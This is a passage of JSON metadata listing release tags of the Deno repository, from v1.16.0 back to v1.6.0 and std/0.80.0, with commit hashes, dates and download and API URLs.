es/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v